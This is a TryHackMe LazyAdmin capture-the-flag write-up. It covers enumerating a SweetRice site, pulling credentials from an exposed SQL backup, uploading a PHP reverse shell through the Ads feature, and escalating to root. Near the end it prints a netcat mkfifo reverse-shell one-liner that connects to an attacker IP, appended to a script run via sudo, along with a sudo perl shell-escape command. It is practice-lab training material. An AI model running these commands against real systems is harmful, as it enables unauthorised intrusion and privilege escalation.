LazyAdmin (THM)
TryHackMe – LazyAdmin Write-Up
topics: Web application security, public exploits, PHP RCE through misconfigured website (OWASP), Linux Privilege Escalation
Enumeration
Local Privilege Escalation
Root Privilege Escalation
tools: nmapAutomator, dirsearch, searchsploit, kali php reverse shell, perl, sudo
Enumeration
initial nmap scan ../.autonmap.sh $ip Full
We have two ports open, SSH and HTTP. There is a default Apache homepage so lets run a dirsearch
scan
python3 dirsearch.py -u $ip -e php,html,txt
There is one unique directory on the website named content, navigating to it reveals a website running SweetRice. Checking with searchsploit
reveals
There appears to be several methods in which we'll be able to achieve local access. At first I looked at the "Arbitrary File Upload" program but it requires credentials. The "Backup Disclosure" text file reveals a file location that houses site credentials
The site is hosted under the /content directory so we'll have to check /content/inc/mysql_backup
This .sql file contains credentials for the website, cracking the password reveals the credentials manager:Password123
Coming back to the python program with credentials does not execute properly and without an error message to troubleshoot. However, within the code is a mention of a login page /as
Local Privilege Escalation
While we're aware of a login page, I went back through the searchsploit
options, focusing next on PHP RCE now that we have credentials.
This means that within the Ads section on the website dashboard, we'll be able to include PHP code that executes the system shell. I used the code from the default Kali php reverse shell and created a new Ad.
The instructions mention that the shell will be located at /sweetrice/inc/ads/hacked.php, for us /content/inc/ads/ww.php. Navigating to the location and listening for the shell provide local access to the box
Root Privilege Escalation
As always with Linux boxes, sudo -l
We do not have the password of the current user www-data so we'll be unable to execute the shell with perl using sudo perl -e 'exec "/bin/sh";'
Instead we also have sudo
permissions with a Perl program in another home folder, lets check the contents
We have read/write permissions for this file, meaning we can edit it to include the attacking address. Add a new line with the attacking address and listen for the shell, it will attempt to connect to the first IP address and will take a minute to connect
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.18.145 5554 >/tmp/f' >> copy.sh
sudo /usr/bin/perl /home/itguy/backup.pl
Last updated